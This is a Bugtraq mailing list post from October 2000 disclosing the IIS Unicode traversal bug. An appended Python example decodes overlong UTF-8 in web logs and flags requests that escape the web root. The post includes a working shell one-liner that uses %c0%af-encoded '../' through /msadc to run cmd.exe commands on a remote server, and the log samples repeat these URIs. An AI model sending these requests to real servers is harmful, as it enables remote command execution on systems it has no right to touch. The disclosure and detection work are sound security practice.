Bugtraq mailing list archives
%c1%1c NT remote execution, YES YOU CAN GET OUT OF DOCUMENT_ROOT_DRIVE!
From: Marco <m.v.berkum () obit nl>
Date: Fri, 20 Oct 2000 22:56:08 +0200
Hi,

A friend (Dimitri van de Giessen) called me after reading the article regarding this remote execution UNICODE style bug in the IIS webserver (supposedly >4.0) found by an anonymous packetstorm mailer and investigated by RFP. Again NT??!? Yes... again... I called in another friend (Kristian Vlaardingerbroek) to eat a lot and to help me find out this funny bug.

We started investigating and after a while we found that rain forest puppy's string "%c1%af" worked on our English version of NT 4.0. Playing a bit, feeling tired, we found that you CAN get out of the document_root_drive to execute cmd.exe.

Remember the msadc RDS "feature"? Ok, so why not use /msadc? It's a directory placed on the system drive and usually accessible through normal HTTP requests. Knowing this you would know that putting the website on a different drive than your system drive would not make a difference at all ;) You can put it on Q:\> if you like, you're still possibly vulnerable.

Imagine what you could do with this:

----blaat.sh----
#!/bin/sh
lynx -dump http://$1/msadc/..\%c0\%af../..\%c0\%af../..\%c0\%af../winnt/system32/cmd.exe\?/c\+$2+$3+$4+$5+$6+$7
--------------

./blaat.sh www.yourownmachine.com dir c:\\ <- you need the double backslash to escape it.

And voila, a dir listing.

It seems that every different language version of NT has different UNICODE chars, didn't find out other countries yet, will be easy to make in perl as RFP described (not going to give you source code either ;-)).

Most probably sample files like pagevieuw and codebrws.asp, other IIS samples and other "features" like msadc, webhits, newdsn and +.htr (%2B) get interesting AGAIN when placed on other dirs viewable by the dir c:\\anything command.

Get blisters patching your NT. Now you can execute commands, welcome to the amazing world of Microsoft(TM).

Cheers,

Marco van Berkum, Dimitri van de Giessen, Kristian Vlaardingerbroek.
Marco - www.obit.nl (marco () obit nl) http://www.britney.com
Dimitri - www.IS-Watch.nl (info () IS-Watch nl) http://www.is-watch.nl/microsoft.jpg ;)
Kristian - www.obit.nl (kris () obit nl) http://www.slashdot.org
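A defender-side check for the traversal described in the post above, added here as an example and not part of the original message: it decodes percent-encoded request paths the way a lenient UTF-8 decoder would (%c0%af to '/', %c1%9c or %c1%1c to '\') and then flags any request whose decoded path climbs above the web root, i.e. it performs the check after decoding rather than before. The log lines and the `flag_log_lines` helper are constructed for this example.

```python
from urllib.parse import unquote_to_bytes

# Constructed web-log lines (client, method, URI); the traversal URIs mirror the post.
SAMPLE_LOG = """\
10.0.0.5 GET /default.htm
10.0.0.9 GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\
10.0.0.9 GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
10.0.0.7 GET /images/logo.gif
10.0.0.7 GET /docs/../index.htm
"""

def lenient_decode(raw: bytes) -> str:
    """Mimic a lenient UTF-8 decoder: a 0xC0/0xC1 lead byte plus ANY next byte
    collapses to (lead & 0x1F) << 6 | (next & 0x3F), so %c0%af -> '/',
    %c1%9c -> backslash and even the malformed %c1%1c -> backslash."""
    out, i = [], 0
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw):
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out)

def escapes_root(uri: str) -> bool:
    """True if the request path, once fully decoded, climbs above the web root.
    The '..' check runs AFTER decoding; the vulnerable server checked first."""
    path = uri.split("?", 1)[0]
    decoded = lenient_decode(unquote_to_bytes(path)).replace("\\", "/")
    depth = 0
    for seg in decoded.split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False

def flag_log_lines(log: str) -> list:
    """Return (client, uri) pairs for requests that escape the web root."""
    hits = []
    for line in log.splitlines():
        client, _method, uri = line.split(" ", 2)
        if escapes_root(uri):
            hits.append((client, uri))
    return hits
```

A plain `/docs/../index.htm` is not flagged because it never leaves the root; only the overlong-encoded requests are.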